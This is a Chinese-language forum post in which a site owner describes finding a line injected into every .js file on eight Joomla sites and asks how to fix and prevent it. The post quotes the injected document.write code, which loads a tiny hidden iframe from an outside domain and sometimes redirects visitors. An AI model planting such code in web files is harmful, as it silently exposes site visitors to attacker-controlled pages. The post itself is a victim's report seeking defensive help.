一个月前发现自己的服务器上所有站点(8个站点),在打开页面时总是加载一个国外连接。并且,在页面的最上方多出一个横条,使用浏览器的“查看元素”功能查看此横条,发现源代码中多了一部分:translatestrengths.org/usisec?8" align="middle" frameborder="no" height="5" scrolling="auto" width="5">
通过在服务器源文件内进行关键字搜索,发现所有.js文件内都会多这出一行代码
document.write('translatestrengths.org/usisec?8" scrolling="auto" frameborder="no" align="center" height="5" width="5">');
而且translatestrengths.org还随时间会变化成其他网站。
最严重时,网站打开后直接跳转到国外网站。
因此我断定,网站文件被注入了。漏洞及解决方法至今未找到。无奈只能将老的备份迁移到新的服务器上进行恢复。请问各位有何避免或修复此问题的解决方法。
试问joomla如此不堪一击吗?如何防范呢?我怀疑可能是某个组件漏洞造成的全部感染,盼请高手指点!
